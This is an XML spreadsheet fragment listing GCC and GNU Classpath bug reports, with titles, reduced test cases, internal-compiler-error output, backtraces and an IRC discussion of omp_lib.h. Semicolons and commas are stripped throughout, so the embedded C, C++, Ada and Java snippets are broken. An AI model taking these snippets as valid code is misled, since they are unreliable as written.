configured with: ./configure
How-To-Repeat:
See attachments for gimpcontext.s.uu
</t>
  </si>
  <si>
    <t>gry</t>
  </si>
  <si>
    <t>GCC-69013</t>
  </si>
  <si>
    <t>[5/6 Regression] gfortran-5.3.0 ICE in prune_uninit_phi_opnds_in_unrealizable_paths at tree-ssa-uninit.c:1121</t>
  </si>
  <si>
    <t>Created attachment 37104
source file from ncarg 6.3.0 
Using gcc-5.3.0 from Macports on OS X Mavericks the command:
/opt/local/bin/gfortran-mp-5 -fPIC -fno-range-check -m64 -Wall  -O2 -c -o vtcudr.o vtcudr.f
internal compiler error: in prune_uninit_phi_opnds_in_unrealizable_paths at tree-ssa-uninit.c:1121
vtcudr.f:1:0: internal compiler error: Abort trap: 6
gfortran-mp-5: internal compiler error: Abort trap: 6 (program f951)
Please submit a full bug report
This is a regression from macports' gcc-5.2.0.</t>
  </si>
  <si>
    <t>gnwiii</t>
  </si>
  <si>
    <t>GCC-15478</t>
  </si>
  <si>
    <t>gfortran manual problems</t>
  </si>
  <si>
    <t>As noted in 
the gfortran manual has the following problems:
Contrary to the claim in the manual it does not document how to report
bugs nor should it as that is documented in bugs.html.
The whole Compiling and Testing chapter should go away binaries have a
place to document them in install.texi as do prerequisites such as GMP.</t>
  </si>
  <si>
    <t>GCC-22418</t>
  </si>
  <si>
    <t>Ada produces mis-match (non compatible) types in MODIFY_EXPR</t>
  </si>
  <si>
    <t>Another one:
PROCEDURE CC1204A IS
BEGIN
     DECLARE
          TYPE ARR IS ARRAY (natural RANGE ) OF CHARACTER
          TYPE RECD (C : natural := 1) IS
               RECORD
		    C1 : ARR (1..C)
               END RECORD
          X1 : RECD
          GENERIC
               P2 : IN RECD
          PROCEDURE PROC
          PROCEDURE PROC IS
          BEGIN
               null
          END PROC
     BEGIN     
          DECLARE
               PROCEDURE PR IS NEW PROC
                    ( P2 =&gt; X1 )
          BEGIN
               null
          END
     END
END CC1204A
Again see PR 22368 for the patch which I used to find this.</t>
  </si>
  <si>
    <t>GCC-4982</t>
  </si>
  <si>
    <t>LALR Grammar for PL/SQL required</t>
  </si>
  <si>
    <t xml:space="preserve"> This is a multi-part message in MIME format.
 ------=_NextPart_000_0084_01C17ACA.B0A6FA00
 Content-Type: text/plain
 	charset=iso-8859-1
 Content-Transfer-Encoding: quoted-printable
 Hai everbody
       Iam presently working on a project which is to design a SQL kind =
 of package in multiple languages and for that
 i need the LALR Grammar for PL/SQL. Can somebody
 help me in finding a better one.
 Thanks
 Sudhir
 ------=_NextPart_000_0084_01C17ACA.B0A6FA00
 Content-Type: text/html
 	charset=iso-8859-1
 Content-Transfer-Encoding: quoted-printable
 &lt;META content=3Dtext/html charset=3Diso-8859-1 =
 http-equiv=3DContent-Type&gt;
 Hai everbody
  Iam =
 presently=20
 working on a project which is to design a SQL kind of package in =
 multiple=20
 languages and for that
 i need the LALR Grammar for PL/SQL. =
 Can=20
 somebody
 help me in finding a better =
 one.
 Thanks
 Sudhir
 ------=_NextPart_000_0084_01C17ACA.B0A6FA00--
 _________________________________________________________
 Do You Yahoo!?
 Get your free @yahoo.com address at http://mail.yahoo.com
Release:
unknown</t>
  </si>
  <si>
    <t>ssudhir_sharma</t>
  </si>
  <si>
    <t>GCC-25101</t>
  </si>
  <si>
    <t>[4.1] Zero stride allowed in FORALL:s</t>
  </si>
  <si>
    <t>using GNU Fortran 95 (GCC) 4.1.0 20051126 (prerelease)  with '-g -pedantic -std=f95' I get a bad / no diagnostic for the following invalid code:
INTEGER :: A(10)J(2)I
FORALL(I=1:2:0)
A(I)=1
END FORALL
END</t>
  </si>
  <si>
    <t>CLASSPATH-17060</t>
  </si>
  <si>
    <t>AWT: problems with drawImage and transparent images</t>
  </si>
  <si>
    <t>The attached testcase demonstrates incorrect handling of transparent 
images in AWT/GtK.
1. The upper button demonstrates that loading and drawing a transparent image
   almost works. However while the background color is respected the red
   line should not be overdrawn by the image.
2. In the second button libgcj incorrectly uses the (default Gtk)
   background color instead of the expected background.
Download testcase from
tams-www.informatik.uni-hamburg.de/applets/jfig/archive/GcjTransparentImageButton.java</t>
  </si>
  <si>
    <t>GCC-83359</t>
  </si>
  <si>
    <t>[8 Regression] ICE in expand_LOOP_DIST_ALIAS at internal-fn.c:2362</t>
  </si>
  <si>
    <t>gcc-8.0.0-alpha20171126 snapshot (r255155) ICEs when compiling the following snippet w/ -O3 (-Ofast) -floop-parallelize-all -ftree-parallelize-loops=2:
int uw m0 wy
void
bp (int jf int lz)
{
  int *qu = 
  int *c5 = 
  for (uw = 0 uw &lt; 1 ++uw)
    qu = 
  while (m0 &lt; 10)
    {
      for (m0 = 0 m0 &lt; 1 ++m0)
        if (jf == 0)
          while (jf &lt; 1)
            ++jf
        else
          while (jf &lt; 1)
            {
              qu = 
              ++jf
            }
      ++m0
    }
  for ()
    for (wy = 0 wy &lt; 2 ++wy)
      {
        if (*qu != 0)
          uw = *c5
        c5 = 
        lz = 0
      }
}
% powerpc-e300c3-linux-gnu-gcc-8.0.0-alpha20171126 -O3 -floop-parallelize-all -ftree-parallelize-loops=2 -c -w drtdvf1q.c                                                                 
during RTL pass: expand
drtdvf1q.c: In function 'bp':
drtdvf1q.c:4:1: internal compiler error: in expand_LOOP_DIST_ALIAS at internal-fn.c:2362
 bp (int jf int lz)
 ^~
0x9b232a expand_LOOP_DIST_ALIAS
	/var/tmp/portage/cross-powerpc-e300c3-linux-gnu/gcc-8.0.0_alpha20171126/work/gcc-8-20171126/gcc/internal-fn.c:2362
0x724bd7 expand_call_stmt
	/var/tmp/portage/cross-powerpc-e300c3-linux-gnu/gcc-8.0.0_alpha20171126/work/gcc-8-20171126/gcc/cfgexpand.c:2584
0x724bd7 expand_gimple_stmt_1
	/var/tmp/portage/cross-powerpc-e300c3-linux-gnu/gcc-8.0.0_alpha20171126/work/gcc-8-20171126/gcc/cfgexpand.c:3607
0x724bd7 expand_gimple_stmt
	/var/tmp/portage/cross-powerpc-e300c3-linux-gnu/gcc-8.0.0_alpha20171126/work/gcc-8-20171126/gcc/cfgexpand.c:3773
0x726ddf expand_gimple_basic_block
	/var/tmp/portage/cross-powerpc-e300c3-linux-gnu/gcc-8.0.0_alpha20171126/work/gcc-8-20171126/gcc/cfgexpand.c:5772
0x72cf2f execute
	/var/tmp/portage/cross-powerpc-e300c3-linux-gnu/gcc-8.0.0_alpha20171126/work/gcc-8-20171126/gcc/cfgexpand.c:6373</t>
  </si>
  <si>
    <t>GCC-8491</t>
  </si>
  <si>
    <t>Re: SSA-BRANCH-Crash on typecasting code blocks simple</t>
  </si>
  <si>
    <t xml:space="preserve"> On Thursday November 7 2002 at 09:55  AM James Michael DuPont wrote:
 &gt; This code will crash I have simplified the test case:
 &gt; Originally from the Postgres perl code.
 &gt; Is this ok?
 &gt; Otherwise I will file a GNATS.
 &gt;
 &gt; Using the  ssa cvs from halloween 20021031
 &gt; void f( int x )
 &gt; {
 &gt;     int x 
 &gt;     (void)
 &gt;       (
 &gt;       { 		
 &gt; 	 x  = 1 
 &gt; 	 return
 &gt; 	
 &gt;       }
 &gt;       )
 &gt; }
 &gt; ------------------
 &gt; Pg.i.c: In function `f':
 &gt; Pg.i.c:3: warning: declaration of `x' shadows a parameter
 &gt; Pg.i.c:4: internal compiler error: in simplify_stmt_expr at
 &gt; c-simplify.c:797
 &gt; --------------------
 Sigh.
 The real problem is somewhere else.
 It shouldn't get to this check in this case because the STMT_EXPR_STMT 
 should have a void type.
 Clearly.
 The code in question is:
 static void
 simplify_stmt_expr (expr_p pre_p)
       tree *expr_p
       tree *pre_p
 {
    tree body = STMT_EXPR_STMT (*expr_p)
 if (VOID_TYPE_P (TREE_TYPE (*expr_p)))
      *expr_p = empty_stmt_node
    else
      {
 	....	
 	}
 --Dan
Release:
unknown</t>
  </si>
  <si>
    <t>CLASSPATH-25769</t>
  </si>
  <si>
    <t>AbstractCollection.toString differers a bit.</t>
  </si>
  <si>
    <t>I know I'm being a bit assine on these issues but...
Despite Sun's documentation of toString on AbstractCollection it handles the case where an element of the collection is in fact itsself.
E.g. the following code:
import java.util.*
public class Test
{
   public static void main(String[] args)
   {
      ArrayList list = new ArrayList()
      list.add(list)
      System.out.println(list)
      ArrayList list2 = new ArrayList()
      list2.add(list)
      list.add(list2)
      System.out.println(list)
   }
}
produces on sun:
[(this Collection)]
&gt;
and (what should) on IKVM:
&gt;
(what IKVM actually produces is fatal stack overflow error).</t>
  </si>
  <si>
    <t>GCC-41552</t>
  </si>
  <si>
    <t>Undefined references with -flto dependent on object file ordering</t>
  </si>
  <si>
    <t>&gt; ./g++ -B. -fPIC -O -flto -c dvector.3.ii slufactor.3.ii
&gt; ./g++ -nostdlib -B. -fPIC -O -shared -o t slufactor.3.o dvector.3.o
&gt; nm t | grep _ZN6soplex7DVectoraSERKNS_6VectorE
&gt; ./g++ -nostdlib -B. -fPIC -O -shared -o t dvector.3.o slufactor.3.o
&gt; nm t | grep _ZN6soplex7DVectoraSERKNS_6VectorE
&gt; ./g++ -nostdlib -B. -fPIC -O -shared -o t dvector.3.o slufactor.3.o -flto
&gt; nm t | grep _ZN6soplex7DVectoraSERKNS_6VectorE
                 U _ZN6soplex7DVectoraSERKNS_6VectorE
&gt; ./g++ -nostdlib -B. -fPIC -O -shared -o t slufactor.3.o dvector.3.o -flto
&gt; nm t | grep _ZN6soplex7DVectoraSERKNS_6VectorE
00000000000004f2 W _ZN6soplex7DVectoraSERKNS_6VectorE
WTF?  1) That function probably is inlined without lto 2) Obviously the
merged cgraph is dependent on the ordering of object files on the link
command line...
slufactor.3.ii:
---------------
namespace soplex {
    class Vector {
    public:
        Vector
        int dim() const    { }
    }
    class DVector : public Vector {
    public:
        void reDim(int newdim)
        DVector&amp; operator=(const Vector&amp; vec)    {
            if (vec.dim() != dim())
              reDim(vec.dim())
            Vector::operator=(vec)
        }
    }
    class SLinSolver { }
    class CLUFactor { }
    class SLUFactor : public SLinSolver private CLUFactor {
        DVector vec
        void solveRight (Vector
    }
    void SLUFactor::solveRight (Vector&amp; x const Vector&amp; b) {
        vec = b
        vec = b
    }
}
----------
dvector.3.ii:
------------
namespace soplex {
    typedef double Real
    class Vector {
        int dimen
        Real* val
    public:
        Vector(int p_dimen Real *p_val)
            : dimen(p_dimen)        val(p_val)    { }
        int dim() const    {
            return dimen
        }
    }
    class DVector : public Vector {
        Real* mem
        void reDim(int newdim)
        explicit DVector(const Vector
        DVector&amp; operator=(const Vector&amp; vec)    {
            if (vec.dim() != dim())
              reDim(vec.dim())
        }
    }
    DVector::DVector(const Vector&amp; old)
        : Vector(0 0)     mem( 0 )
      {
        *this = old
      }
}
----------</t>
  </si>
  <si>
    <t>GCC-2902</t>
  </si>
  <si>
    <t>collect2 doesn't find ctors/dtors in shared libraries under hpux10.20</t>
  </si>
  <si>
    <t>The symptom is a large number of failures in the testsuite with the following error:
Executing on host: /xxx/gnu/gcc-3.0/objdir/gcc/xgcc -B/xxx/gnu/gcc-3.0/objdir/gcc/ /xxx/gnu/gcc-3.0/gcc/testsuite/objc/execute/_cmd.m  -w  -O  -I/xxx/gnu/gcc-3.0/gcc/testsuite/../../libobjc -L/xxx/gnu/gcc-3.0/objdir/hppa1.1-hp-hpux10.20/libobjc/.libs  -lobjc -lm   -fPIC -o /xxx/gnu/gcc-3.0/objdir/gcc/testsuite/_cmd.x
  (timeout = 300)
PASS: objc/execute/_cmd.m compilation  -O
objc runtime: cannot find class Object
FAIL: objc/execute/_cmd.m execution  -O
In debugging this I found that the constructors to build the
classes Object and NXConstantString don't run when the application
is linked with a shared libobjc.  This is apparently because
collect2 can't determine that these constructors are needed.
Here is part of the output generated by collect2 with `-debug'
linking _cmd.x:
/usr/ccs/bin/ld -L/lib/pa1.1 -L/usr/lib/pa1.1 -z -u main -o /xxx/gnu/gcc-3.0/objdir/gcc/testsuite/_cmd.x /usr/ccs/lib/crt0.o -L/xxx/gnu/gcc-3.0/objdir/hppa1.1-hp-hpux10.20/libobjc/.libs -L/xxx/gnu/gcc-3.0/objdir/gcc -L/usr/local/lib/gcc-lib/hppa1.1-hp-hpux10.20/3.0 -L/usr/ccs/bin -L/usr/ccs/lib -L/opt/langtools/lib -L/usr/local/lib/gcc-lib/hppa1.1-hp-hpux10.20/3.0/../../.. /var/tmp/ccapeMug.o -lobjc -lm -lgcc -lc -lgcc
 /usr/local/lib/gcc-lib/hppa1.1-hp-hpux10.20/3.0/../../../../hppa1.1-hp-hpux10.20/bin/nm -n /xxx/gnu/gcc-3.0/objdir/gcc/testsuite/_cmd.x
nm output with constructors/destructors.
        000025e8 T _GLOBAL__I_main
 /usr/ccs/bin/chatr /xxx/gnu/gcc-3.0/objdir/gcc/testsuite/_cmd.x
ldd output with constructors/destructors.
                     dynamic   /xxx/gnu/gcc-3.0/objdir/hppa1.1-hp-hpux10.20/libobjc/.libs/libobjc.sl.1
                     dynamic   /usr/lib/libc.1
 /usr/local/lib/gcc-lib/hppa1.1-hp-hpux10.20/3.0/../../../../hppa1.1-hp-hpux10.20/bin/nm -n /xxx/gnu/gcc-3.0/objdir/hppa1.1-hp-hpux10.20/libobjc/.libs/libobjc.sl.1
nm output with constructors/destructors.
        00017aa0 T _GLOBAL__I___objc_linking
        00017ad0 T _GLOBAL__I___objc_linking
        00018210 T _GLOBAL__I_.._.._.._libobjc_NXConstStr.mSFndDa
        00018228 T _GLOBAL__I_.._.._.._libobjc_NXConstStr.mSFndDa
        0001a1e0 T _GLOBAL__I_.._.._.._libobjc_Object.mOXKa8a
        0001a1f8 T _GLOBAL__I_.._.._.._libobjc_Object.mOXKa8a
        0001b058 T _GLOBAL__I_.._.._.._libobjc_Protocol.mxvicuc
        0001b070 T _GLOBAL__I_.._.._.._libobjc_Protocol.mxvicuc
 /usr/local/lib/gcc-lib/hppa1.1-hp-hpux10.20/3.0/../../../../hppa1.1-hp-hpux10.2
0/bin/nm -n /usr/lib/libc.1
nm output with constructors/destructors.
1 constructor(s) found
0 destructor(s)  found
0 frame table(s) found
[Leaving /xxx/gnu/gcc-3.0/objdir/gcc/testsuite/_cmd.x]
Release:
gcc version 3.0 20010518 (prerelease)
Environment:
# ../../gcc/configure  --host=hppa1.1-hp-hpux10.20 --target=hppa1.1-hp-hpux10.20 --srcdir=../../gcc --with-gcc-version-trigger=/xxx/gnu/gcc-3.0/gcc/version.c --with-gnu-as --enable-shared --enable-threads --enable-debug=no
How-To-Repeat:
Configure with `--enable-shared'.</t>
  </si>
  <si>
    <t>dave.anglin</t>
  </si>
  <si>
    <t>GCC-60743</t>
  </si>
  <si>
    <t>build/genautomata uses 700 MB memory for ARM</t>
  </si>
  <si>
    <t>build/genautomata ../../gcc-4.9-trunk/gcc/config/arm/arm.md \
          insn-conditions.md &gt; tmp-automata.c
=&gt; uses way too much memory/takes too long to complete.
this was observed when building a cross compiler for arm-linux-gnueabi
on a i686-pc-linux-gnu system.
This build-step used significantly less memory in the past.</t>
  </si>
  <si>
    <t>GCC-50207</t>
  </si>
  <si>
    <t>[4.7 Regression] G++ segv's on reduced test case</t>
  </si>
  <si>
    <t>A G++ from today's trunk (20110826) segv's on a reduced test case (using delta) like so:
bergner@igoo:~&gt; cat minimal.ii 
typedef long unsigned int size_t
namespace std __attribute__ ((__visibility__ (default)))
{
  using::size_t
}
typedef unsigned char uint8_t
namespace std
{
  namespace decimal
  {
    template  struct _FmtTraits
    class decimal32
  }
}
namespace std
{
  namespace decimal
  {
    template  class _FmtTraits 
    {
      public:
      static const std::size_t _NumBytes = 4UL
    }
    template  class _DecBase
    {
      uint8_t _Bytes[_Tr::_NumBytes]
    }
    class decimal32:public _DecBase  &gt;
    {
      decimal32 () { }
    }
  }
}
bergner@igoo:~&gt; /home/bergner/gcc/install/gcc-mainline-debug/bin/g++ -Wall -S minimal.ii 
g++: internal compiler error: Segmentation fault (program cc1plus)
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
GDB show this backtrace:
#0  0x0000000010412cc8 in decl_is_template_id (decl=0xfffb6edcc18 template_info=0xfffb6edcc18)
    at /home/bergner/gcc/gcc-mainline-base/gcc/cp/mangle.c:267
#1  0x000000001041b44c in write_nested_name (decl=0xfffb6e24ac0) at /home/bergner/gcc/gcc-mainline-base/gcc/cp/mangle.c:928
#2  0x000000001041ab48 in write_name (decl=0xfffb6e24ac0 ignore_local_scope=0) at /home/bergner/gcc/gcc-mainline-base/gcc/cp/mangle.c:855
#3  0x00000000104284e4 in write_class_enum_type (type=0xfffb6edd4a0) at /home/bergner/gcc/gcc-mainline-base/gcc/cp/mangle.c:2398
#4  0x0000000010424840 in write_type (type=0xfffb6edd4a0) at /home/bergner/gcc/gcc-mainline-base/gcc/cp/mangle.c:1884
#5  0x000000001042d1ec in write_template_arg (node=0xfffb6edcc18) at /home/bergner/gcc/gcc-mainline-base/gcc/cp/mangle.c:2843
#6  0x0000000010428868 in write_template_args (args=0xfffb6f13a70) at /home/bergner/gcc/gcc-mainline-base/gcc/cp/mangle.c:2427
#7  0x000000001041b50c in write_nested_name (decl=0xfffb6e245b8) at /home/bergner/gcc/gcc-mainline-base/gcc/cp/mangle.c:932
#8  0x000000001041ab48 in write_name (decl=0xfffb6e245b8 ignore_local_scope=0) at /home/bergner/gcc/gcc-mainline-base/gcc/cp/mangle.c:855
#9  0x00000000104284e4 in write_class_enum_type (type=0xfffb6edccc0) at /home/bergner/gcc/gcc-mainline-base/gcc/cp/mangle.c:2398
#10 0x0000000010424840 in write_type (type=0xfffb6edccc0) at /home/bergner/gcc/gcc-mainline-base/gcc/cp/mangle.c:1884
#11 0x000000001042d1ec in write_template_arg (node=0xfffb6edccc0) at /home/bergner/gcc/gcc-mainline-base/gcc/cp/mangle.c:2843
#12 0x0000000010428868 in write_template_args (args=0xfffb6f14088) at /home/bergner/gcc/gcc-mainline-base/gcc/cp/mangle.c:2427
#13 0x000000001041b50c in write_nested_name (decl=0xfffb6e24ac0) at /home/bergner/gcc/gcc-mainline-base/gcc/cp/mangle.c:932
#14 0x000000001041ab48 in write_name (decl=0xfffb6e24ac0 ignore_local_scope=0) at /home/bergner/gcc/gcc-mainline-base/gcc/cp/mangle.c:855
#15 0x00000000104284e4 in write_class_enum_type (type=0xfffb6edd4a0) at /home/bergner/gcc/gcc-mainline-base/gcc/cp/mangle.c:2398
#16 0x0000000010424840 in write_type (type=0xfffb6edd4a0) at /home/bergner/gcc/gcc-mainline-base/gcc/cp/mangle.c:1884
#17 0x000000001042d1ec in write_template_arg (node=0xfffb6edcc18) at /home/bergner/gcc/gcc-mainline-base/gcc/cp/mangle.c:2843
#18 0x0000000010428868 in write_template_args (args=0xfffb6f13a70) at /home/bergner/gcc/gcc-mainline-base/gcc/cp/mangle.c:2427
...
The backtrace also show we have 10's of thousands of frames stacked repeated over and over so it looks like we've gone into some type of infinite recursion.  A quick look at GCC 4.6 show's it fails in the same manner.  I haven't checked anything earlier.</t>
  </si>
  <si>
    <t>GCC-30950</t>
  </si>
  <si>
    <t>intrinsic: CPU_TIME</t>
  </si>
  <si>
    <t>subroutine = {
	name = 'cpu_time'
	arg  = 'x'
	call = 'CALL cpu_time(x = real_4)'
	call = 'CALL cpu_time(x = real_8)'
}
1. The name of the dummy argument is TIME instead of X as documented.</t>
  </si>
  <si>
    <t>GCC-33600</t>
  </si>
  <si>
    <t>[4.3 Regression] Breakage caused by the fix to PR33552</t>
  </si>
  <si>
    <t>The fix to PR33552 unfortunately breaks the Linux kernel build.
Reduced testcase attached but hey I'll put it inline as well:
int f(int n)
{
        int x
        asm( : =
        return n
}
And the error is:
usercopy.i:5: error: 'asm' operand has impossible constraints</t>
  </si>
  <si>
    <t>GCC-56224</t>
  </si>
  <si>
    <t>[4.8 Regression] gfortran -fopenmp cannot find omp_lib.h</t>
  </si>
  <si>
    <t>$ cat ~/a.f
        include omp_lib.h
        end
Compiled with trunk as of 2013-02-04:
$ gcc48/bin/gfortran -c a.f
a.f:1: Error: Can't open included file 'omp_lib.h'
Compiled with GCC 4.7:
$ gcc47/bin/gfortran -c a.f
$
Jakub and I discussed this on IRC:
07:58:20 dnovillo: jakub: i see the file in â€¦./finclude/omp_lib.h but when i run the libgomp testsuite with the installed compiler the #include directives in the libgomp fortran tests can't find that file.
07:58:22 jakub: dnovillo: it is omp_lib.h generally should be #included so what matters is the standard preprocessor search path and omp_lib.h should be there
07:58:41 richi: maybe I should code up a discover undetected loops routine
07:58:51 jakub: dnovillo: omp_lib without .h should be USEd
07:59:18 dnovillo: jakub: this is being included by libgomp.fortran/appendix-a/a.18.1.f90
08:00:08 dnovillo: the problem is that when i run the testsuite standalone I don't see a -I to the .../finclude directory.  This works when executed from the build directory so I may be missing some settings in my dejagnusetup.
08:00:17 jakub: dnovillo: finclude/ is for modules I thought
08:00:41 dnovillo: well that's where the file ends up in the installed image.
08:00:54 dnovillo: fortran modules have a different search path?
08:02:22 jakub:       include omp_lib.h
08:02:22 jakub:       end
08:02:33 jakub: gfortran -fopenmp -o /tmp/a /tmp/a.f
08:02:46 jakub: works just fine for me with installed compiler (Fedora 17 one)
08:04:10 dnovillo: hmm there may be another wrinkle here then.  i'm getting
08:04:26 dnovillo: $ bin/gfortran -fopenmp -o /tmp/a.o ~/a.f
/home/dnovillo/a.f:1: Error: Can't open included file 'omp_lib.h'
08:04:50 dnovillo: with gfortran from trunk as of 4/Feb.
08:05:02 jakub: even
08:05:08 jakub: #include omp_lib.h
08:05:11 jakub:       end
08:05:21 jakub: gfortran -fopenmp -o /tmp/a /tmp/a.F works for me
08:05:32 dnovillo: with trunk gfortran i suppose?
08:05:51 jakub: dnovillo&gt; 4.7 but there weren't any changes I'm aware of
08:06:00 jakub: dnovillo: let me try 4.8-RH gfortran
08:06:01 dnovillo: ah 4.7 works fine for me.
08:06:15 dnovillo: it's 4.8 that i can't get to work.
08:09:01 jakub: dnovillo: ok I can reproduce the problem with 4.8
08:09:35 dnovillo: i think using USE might work. I see -fintrinsic-modules-path gcc/x86/bin/../lib/gcc/x86_64-grtev3-linux-gnu/4.8.x-google-integration/finclude in the -v output
08:09:39 jakub: dnovillo: can you file a bug against fortran component?  The files are installed the same way as before so it is the FE that changed in some weirdo way
08:09:48 dnovillo: jakub: will do.
08:09:56 jakub: dnovillo: use should be used together with omp_lib not omp_lib.h
08:10:23 dnovillo: ah so the test would have to change.  ok.  i'll file the bug and mark these failures as expected for now in our builds.  thanks.
08:10:38 jakub: dnovillo: perhaps the end of dicsussion will be that omp_lib.h should be installed into include/ instead of finclude/ where it would supposedly work
08:11:05 jakub: dnovillo: even in 4.7 gfortran -E with #include omp_lib.h didn't work but -c worked
08:11:30 dnovillo: heh.  but we'd need it in both places right?  finclude/ is used for USE commands?
08:11:38 jakub: dnovillo: having omp_lib.h in include/ on the other side means that people using C/C++ might try to #include omp_lib.h and be very surprised
08:12:15 jakub: dnovillo: omp_lib.h isn't a module it is a header file it should be used in pre-F90 Fortran only
08:12:30 dnovillo: ah
08:12:38 jakub: dnovillo: USE is F90+ needs omp_lib.f90/omp_lib.mod etc. - i.e. a module</t>
  </si>
  <si>
    <t>GCC-42178</t>
  </si>
  <si>
    <t>[4.5 Regression] Invalid memory access in graphite</t>
  </si>
  <si>
    <t>At r154653 the gcc.dg/graphite/interchange-8.c test case results in a compiler ICE on x86_64-apple-darwin10. The error shows up as...
Executing on host: /sw/src/fink.build/gcc45-4.4.999-20091125/darwin_objdir/gcc/xgcc -B/sw/src/fink.build/gcc45-4.4.999-20091125/darwin_objdir/gcc/ /sw/src/fink.build/gcc45-4.4.999-20091125/gcc-4.5-20091125/gcc/testsuite/gcc.dg/graphite/interchange-8.c   -O2 -fdump-tree-graphite-all  -floop-interchange -fno-loop-block -fno-loop-strip-mine -ffast-math -S  -o interchange-8.s    (timeout = 300)
/sw/src/fink.build/gcc45-4.4.999-20091125/gcc-4.5-20091125/gcc/testsuite/gcc.dg/graphite/interchange-8.c: In function 'foo':
/sw/src/fink.build/gcc45-4.4.999-20091125/gcc-4.5-20091125/gcc/testsuite/gcc.dg/graphite/interchange-8.c:2:1: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
compiler exited with status 1
output is:
/sw/src/fink.build/gcc45-4.4.999-20091125/gcc-4.5-20091125/gcc/testsuite/gcc.dg/graphite/interchange-8.c: In function 'foo':
/sw/src/fink.build/gcc45-4.4.999-20091125/gcc-4.5-20091125/gcc/testsuite/gcc.dg/graphite/interchange-8.c:2:1: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
FAIL: gcc.dg/graphite/interchange-8.c (internal compiler error)
FAIL: gcc.dg/graphite/interchange-8.c (test for excess errors)
Excess errors:
/sw/src/fink.build/gcc45-4.4.999-20091125/gcc-4.5-20091125/gcc/testsuite/gcc.dg/graphite/interchange-8.c:2:1: internal compiler error: Segmentation fault
XFAIL: gcc.dg/graphite/interchange-8.c scan-tree-dump-times graphite will be interchanged 1
A backtrace of the error shows...
Program received signal EXC_BAD_ACCESS Could not access memory.
Reason: KERN_INVALID_ADDRESS at address: 0x0000000000000004
0x00000001004da882 in lst_try_interchange (scop= loop= lst= index=) at ../../gcc-4.5-20091125/gcc/graphite-interchange.c:681
681	    for (i = 0 VEC_iterate (lst_p LST_SEQ (lst) i l) i++)
(gdb) bt
#0  0x00000001004da882 in lst_try_interchange (scop= loop= lst= index=) at ../../gcc-4.5-20091125/gcc/graphite-interchange.c:681
#1  0x00000001004dcc48 in lst_do_interchange_1 (scop=0x141826910 loop=0x14182b460 index=0x7fff5fbfd20c) at ../../gcc-4.5-20091125/gcc/graphite-interchange.c:709
#2  0x00000001004dcca3 in lst_do_interchange (scop=0x141826910 loop=0x14182b460 index=0x7fff5fbfd20c) at ../../gcc-4.5-20091125/gcc/graphite-interchange.c:730
#3  0x00000001004dcd0b in lst_do_interchange (scop=0x141826910 loop=0x14182b480 index=0x7fff5fbfd20c) at ../../gcc-4.5-20091125/gcc/graphite-interchange.c:734
#4  0x00000001004dcd37 in scop_do_interchange (scop=0x141826910) at ../../gcc-4.5-20091125/gcc/graphite-interchange.c:748
#5  0x00000001004de288 in apply_poly_transforms (scop=0x141826910) at ../../gcc-4.5-20091125/gcc/graphite-poly.c:260
#6  0x00000001004caab3 in graphite_transform_loops () at ../../gcc-4.5-20091125/gcc/graphite.c:276
#7  0x000000010076d6ba in graphite_transforms () at ../../gcc-4.5-20091125/gcc/tree-ssa-loop.c:300
#8  0x00000001005ad4e1 in execute_one_pass (pass=0x100bfc200) at ../../gcc-4.5-20091125/gcc/passes.c:1522
#9  0x00000001005ad7dd in execute_pass_list (pass=0x100bfc200) at ../../gcc-4.5-20091125/gcc/passes.c:1577
#10 0x00000001005ad7ef in execute_pass_list (pass=0x100bfbf60) at ../../gcc-4.5-20091125/gcc/passes.c:1578
#11 0x00000001005ad7ef in execute_pass_list (pass=0x100bfb5a0) at ../../gcc-4.5-20091125/gcc/passes.c:1578
#12 0x00000001006df104 in tree_rest_of_compilation (fndecl=0x141e03f00) at ../../gcc-4.5-20091125/gcc/tree-optimize.c:411
#13 0x000000010089782b in cgraph_expand_function (node=0x141d0c440) at ../../gcc-4.5-20091125/gcc/cgraphunit.c:1178
#14 0x000000010089992a in cgraph_optimize () at ../../gcc-4.5-20091125/gcc/cgraphunit.c:1245
#15 0x0000000100899f3f in cgraph_finalize_compilation_unit () at ../../gcc-4.5-20091125/gcc/cgraphunit.c:1107
#16 0x000000010001f472 in c_write_global_declarations () at ../../gcc-4.5-20091125/gcc/c-decl.c:9489
#17 0x00000001006745d2 in toplev_main (argc=28 argv=0x7fff5fbfd5e0) at ../../gcc-4.5-20091125/gcc/toplev.c:1061
#18 0x0000000100000a04 in start ()
Using built-in specs.
COLLECT_GCC=gcc-4
COLLECT_LTO_WRAPPER=/sw/lib/gcc4.5/libexec/gcc/x86_64-apple-darwin10.2.0/4.5.0/lto-wrapper
Target: x86_64-apple-darwin10.2.0
Configured with: ../gcc-4.5-20091125/configure --prefix=/sw --prefix=/sw/lib/gcc4.5 --mandir=/sw/share/man --infodir=/sw/share/info --enable-languages=cc++fortranobjcobj-c++java --with-gmp=/sw --with-libiconv-prefix=/sw --with-ppl=/sw --with-cloog=/sw --with-mpc=/sw --with-system-zlib --x-includes=/usr/X11R6/include --x-libraries=/usr/X11R6/lib --disable-libjava-multilib
Thread model: posix
gcc version 4.5.0 20091125 (experimental) (GCC)</t>
  </si>
  <si>
    <t>GCC-57108</t>
  </si>
  <si>
    <t>[4.7/4.8/4.9] SH internal compiler error: in int_mode_for_mode at stor-layout.c:395</t>
  </si>
  <si>
    <t>Created attachment 29970
for -O1</t>
  </si>
  <si>
    <t>GCC-29846</t>
  </si>
  <si>
    <t>impossible to both expand store flag operations and use a cbranch handler</t>
  </si>
  <si>
    <t>If both a compare operation and a branch exists these are used in preference
to a cbranch handler.  If a compare operation but no branch exists the
cbranch handler is not used.  If no compare operation exists we can't generate
compare / setcc sequences.  cstore patterns are recognized by genopinit but
cause a compiler crash their presence influences code generation.</t>
  </si>
  <si>
    <t>GCC-10262</t>
  </si>
  <si>
    <t>[3.2 regression] cc1plus crashes with large generated code</t>
  </si>
  <si>
    <t>Reading specs from /usr/lib/gcc-lib/i386-slackware-linux/3.2.2/specs
Configured with: ../gcc-3.2.2/configure --prefix=/usr --enable-shared --enable-threads=posix --enable-__cxa_atexit --disable-checking --with-gnu-ld --verbose --target=i386-slackware-linux --host=i386-slackware-linux
Thread model: posix
gcc version 3.2.2
 /usr/lib/gcc-lib/i386-slackware-linux/3.2.2/cc1plus -fpreprocessed genhvmmain.ii -quiet -dumpbase genhvmmain.ii -version -o genhvmmain.s
GNU CPP version 3.2.2 (cpplib) (i386 Linux/ELF)
